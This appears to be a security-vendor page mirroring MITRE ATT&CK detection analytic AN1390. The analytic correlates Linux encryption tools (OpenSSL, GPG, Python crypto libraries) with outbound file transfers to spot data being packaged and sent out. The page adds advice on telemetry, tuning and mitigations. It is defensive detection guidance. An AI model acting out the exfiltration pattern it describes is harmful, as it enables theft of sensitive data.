AN1390: Analytic 1390
Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.
Analyst context for executives and security teams
AN1390 is a Linux-focused detection analytic for situations where command-line tools or scripts use encryption capabilities, such as OpenSSL, GPG, or Python crypto libraries, together with outbound file transfer or traffic to external destinations. For leaders, the value is not that encryption is suspicious by itself; it is that encryption plus external movement can be a material signal that sensitive data is being packaged, protected from inspection, or moved outside normal channels.
Executive priority
Prioritize this analytic where Linux systems handle sensitive data, regulated records, business-critical files, or operational workloads. The business question is whether the organization can show evidence of who encrypted data, what left the environment, and whether the destination was expected. This supports incident triage, compliance evidence, and control validation around egress monitoring, Linux logging, and approved data transfer paths.
Technical view
SOC and detection teams should validate visibility into Linux process execution and command-line arguments for encryption utilities and script interpreters, then correlate that activity with outbound file transfer or external network connections. Because tactics and relationship context are not supplied, treat this as a behavior-level analytic rather than a technique-specific rule. Tuning should distinguish approved administrative, backup, development, and data exchange workflows from unusual combinations of encryption commands, scripting runtimes, and external destinations.
Likely telemetry
- Linux process execution events with command-line arguments
- Shell history or terminal session telemetry where available
- Script interpreter activity, especially Python invoking crypto-related libraries
- File transfer logs from tools or services used for outbound movement
- Network connection, flow, proxy, firewall, or DNS telemetry showing external destinations
Detection direction
- Correlate encryption-related command-line or script activity with outbound connections or file transfers within a defensible time window.
- Baseline legitimate Linux encryption and transfer workflows, such as backups, automation, software release processes, and administrator file handling.
- Tune for external destinations that are unusual for the host, user, service account, or workload.
- Preserve command-line, parent process, user, host, destination, and timing context for incident response review.
- Account for blind spots where command-line logging, script telemetry, or egress visibility is incomplete.
Mitigation priorities
- Ensure Linux endpoint and server logging captures process execution and command-line detail where appropriate.
- Centralize egress telemetry from firewalls, proxies, DNS, and network flow sources for systems that can transfer files externally.
- Define and document approved outbound file transfer methods and destinations for sensitive Linux workloads.
- Use access controls and network egress restrictions to reduce unauthorized external transfer paths.
- Retain sufficient telemetry to support post-incident reconstruction of encrypted file creation and outbound movement.
Analyst notes and limits
This object is a detection analytic, not a full ATT&CK technique entry. The supplied fields identify Linux as the platform and describe detection intent, but no official detection logic, ATT&CK tactics, aliases, labels, or relationship context were provided. The analytic should therefore be implemented as a correlation concept and validated against local Linux workloads and approved data movement patterns.
Coverage cannot be assumed from the ATT&CK object alone. Effectiveness depends on local logging for Linux process execution, command-line capture, script activity, file transfer evidence, and outbound network visibility. The supplied data does not support claims about active exploitation, attribution, specific malware, impact, or guaranteed detection.
Analytic 1390
Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | e1c2d16fd433… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1390Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.